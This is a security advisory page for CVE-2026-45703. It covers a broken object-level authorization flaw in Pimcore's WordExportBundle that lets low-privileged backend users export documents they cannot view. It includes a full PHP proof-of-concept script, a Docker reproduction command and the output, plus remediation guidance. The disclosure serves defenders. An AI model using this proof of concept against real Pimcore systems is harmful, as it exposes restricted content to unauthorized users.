Pimcore WordExportBundle CVE-2026-45703
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself. As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.
In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:
POC-WORDEXPORT-TITLEPOC-WORDEXPORT-DESC
Root Cause
The controller only performs a feature-level permission check before starting the export flow:
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L44)
It then directly resolves the target element from attacker-controlled type/id input:
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)
For document-like elements such as Page and Snippet, it renders content in an admin context:
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)
- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)
No object-level authorization check such as isAllowed('view') is enforced on the target element.
Affected Scope
Based on the source code, the following element types may be affected:
pagesnippetemailobject
For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.
Preconditions
- The attacker is an authenticated backend user
- The attacker has the
word_exportpermission - The attacker does not have
viewpermission on the target document
Reproduction Environment
- Reproduction root:
pimcore-12.3.3-repro - Standalone PoC script: [poc_wordexport.php](pimcore-12.3.3-repro/tools/poc_wordexport.php)
<?php
declare(strict_types=1);
use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;
require dirname(__DIR__) . '/vendor/autoload.php';
define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));
try {
\Pimcore\Bootstrap::bootstrap();
$kernel = new \App\Kernel('dev', true);
\Pimcore::setKernel($kernel);
$kernel->boot();
$container = $kernel->getContainer();
/** @var RequestStack $requestStack */
$requestStack = getService($container, [
RequestStack::class,
'request_stack',
]);
$admin = User::getByName('admin');
if (!$admin instanceof User) {
fail('admin user is missing');
}
$auditor = User::getByName('auditor_wordexport');
if (!$auditor instanceof User) {
$auditor = new User();
$auditor->setParentId(0);
$auditor->setName('auditor_wordexport');
}
$auditor->setAdmin(false);
$auditor->setActive(true);
$auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
$auditor->setPermissions(['word_export']);
$auditor->setRoles([]);
$auditor->setWorkspacesDocument([]);
$auditor->setWorkspacesAsset([]);
$auditor->setWorkspacesObject([]);
$auditor->save();
$page = Page::getByPath('/poc-wordexport-secret-page');
if (!$page instanceof Page) {
$page = new Page();
$page->setParentId(1);
$page->setKey('poc-wordexport-secret-page');
}
$page->setPublished(true);
$page->setController('App\\Controller\\DefaultController::defaultAction');
$page->setTemplate('default/default.html.twig');
$page->setTitle('POC-WORDEXPORT-TITLE');
$page->setDescription('POC-WORDEXPORT-DESC');
$page->setProperty('language', 'text', 'en', false, true);
$page->setUserOwner($admin->getId());
$page->setUserModification($admin->getId());
$page->save();
$canViewPage = $page->getDao()->isAllowed('view', $auditor);
$tokenResolver = buildTokenResolver($auditor);
$controller = wireController(new WordExportController(), $container, $tokenResolver);
$exportId = 'wordexportpoc1';
$exportRequest = new Request([], [
'id' => $exportId,
'data' => json_encode([
['type' => 'document', 'id' => $page->getId()],
], JSON_THROW_ON_ERROR),
'source' => 'en',
]);
$requestStack->push($exportRequest);
$controller->wordExportAction($exportRequest, new Filesystem());
$requestStack->pop();
$downloadRequest = new Request(['id' => $exportId]);
$requestStack->push($downloadRequest);
$downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
$requestStack->pop();
$wordContent = (string) $downloadResponse->getContent();
echo json_encode([
'vulnerability' => 'wordexport_authorization_bypass',
'user' => [
'id' => $auditor->getId(),
'name' => $auditor->getName(),
'permissions' => $auditor->getPermissions(),
],
'target_page' => [
'id' => $page->getId(),
'path' => $page->getFullPath(),
'title' => $page->getTitle(),
'description' => $page->getDescription(),
'user_can_view_page' => $canViewPage,
],
'result' => [
'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
],
], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
fail(sprintf(
'%s: %s in %s:%d%s',
$e::class,
$e->getMessage(),
$e->getFile(),
$e->getLine(),
$e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
));
}
function wireController(
UserAwareController $controller,
ContainerInterface $container,
TokenStorageUserResolver $tokenResolver
): UserAwareController
{
$controller->setContainer($container);
$controller->setTokenResolver($tokenResolver);
if (method_exists($controller, 'setPimcoreSerializer')) {
/** @var PimcoreSerializer $serializer */
$serializer = getService($container, [
PimcoreSerializer::class,
'Pimcore\\Serializer\\Serializer',
]);
$controller->setPimcoreSerializer($serializer);
}
return $controller;
}
function buildTokenResolver(User $user): TokenStorageUserResolver
{
$tokenStorage = new TokenStorage();
$proxyUser = new SecurityUser($user);
$token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
$tokenStorage->setToken($token);
return new TokenStorageUserResolver($tokenStorage);
}
function getService(ContainerInterface $container, array $ids): mixed
{
foreach ($ids as $id) {
try {
if ($container->has($id)) {
return $container->get($id);
}
} catch (Throwable) {
}
}
fail('Unable to resolve service: ' . implode(', ', $ids));
}
function fail(string $message): never
{
fwrite(STDERR, $message . PHP_EOL);
exit(1);
}
Reproduction Steps
- Create a low-privileged user named
auditor_wordexportwith only theword_exportpermission and no document workspace permissions. - Create a test page at
/poc-wordexport-secret-pagecontaining sensitive values:
title = POC-WORDEXPORT-TITLEdescription = POC-WORDEXPORT-DESC
- Verify that the user does not have
viewpermission on that page. - Execute
wordExportAction()andwordExportDownloadAction()as that user. - Check whether the exported HTML contains the sensitive values.
Reproduction command:
cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.phpReproduction Result
Relevant PoC output:
{
"vulnerability": "wordexport_authorization_bypass",
"user": {
"name": "auditor_wordexport",
"permissions": [
"word_export"
]
},
"target_page": {
"path": "/poc-wordexport-secret-page",
"title": "POC-WORDEXPORT-TITLE",
"description": "POC-WORDEXPORT-DESC",
"user_can_view_page": false
},
"result": {
"download_contains_title": true,
"download_contains_description": true
}
}This shows that:
- The user cannot view the target page
- The exported file still contains the page's sensitive content
This confirms that the issue is practically exploitable.
Security Impact
- Unauthorized disclosure of structured page fields
- Unauthorized export of restricted backend content
- Potential exposure of unpublished or otherwise restricted content
- Lateral data access by low-privileged backend accounts
Remediation
- Perform object-level authorization immediately after resolving the element from
type/id. - Require at least
viewpermission on the target element. - Apply consistent authorization checks across
page,snippet,email, andobject. - Bind export creation and export download to the requesting user or an equivalent authorization context.
- Add regression tests to ensure that users with
word_exportbut without elementviewpermission cannot export content.
AnalysisAI
WordExportBundle in Pimcore CMS enforces only feature-level permission (word_export) at export initiation but performs no object-level authorization check against the target document element, constituting a broken object-level authorization (BOLA) flaw. Authenticated low-privileged backend users holding the word_export permission can supply arbitrary type/id parameters to wordExportAction() to export full content - including titles, descriptions, and body - from pages, snippets, emails, or objects they are explicitly denied view access to. A publicly available proof-of-concept script is included in the GitHub security advisory GHSA-332x-r494-54fq confirming practical exploitability; the vulnerability is not currently listed in CISA KEV.
Technical ContextAI
The flaw exists in WordExportBundle/src/Controller/TranslationController.php within the Pimcore CMS platform (Composer package pimcore/pimcore, CPE: pkg:composer/pimcore_pimcore). The vulnerable code path accepts attacker-controlled type and id HTTP request parameters, resolves the corresponding Pimcore element (Page, Snippet, Email, or Object model), and renders it in an admin context (pimcore_admin = true) for Word export - without ever calling isAllowed('view') on the resolved element. CWE-863 (Incorrect Authorization) precisely describes this class: the system verifies the capability permission (word_export) but omits the per-resource authorization check, allowing the feature to be exercised against content the user has no right to access. For page-like document types, rendering in admin context additionally exposes backend-only fields not visible to frontend users. The fix committed in PR #19112 (commit 0ce2232) adds !$element->isAllowed('view') as a short-circuit guard alongside the element-type check at the resolution point in wordExportAction().
RemediationAI
Upgrade pimcore/pimcore to version 12.3.7 or later using Composer (composer require pimcore/pimcore:^12.3.7), which includes the fix from PR #19112 (commit 0ce2232b6f92c79d0ac244e95e21f55c37456ef1) adding the missing isAllowed('view') authorization check on the resolved element in TranslationController::wordExportAction(). The vendor release is at https://github.com/pimcore/pimcore/releases/tag/v12.3.7 and the advisory at https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq. If immediate upgrade is not feasible, revoke the word_export permission from all backend users whose content access scope does not encompass the full document tree - this eliminates the attack surface but disables the Word export feature entirely for those users, which may impact translation workflows. A second option is to restrict HTTP access to the Word export endpoint (/admin/word-export/* or equivalent route) at the web server or reverse proxy layer for non-admin roles; however, this requires precise route scoping to avoid breaking legitimate exports. The vendor additionally recommends adding regression tests to confirm that users with word_export but without element view permission cannot export content.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-863 – Incorrect Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-332x-r494-54fq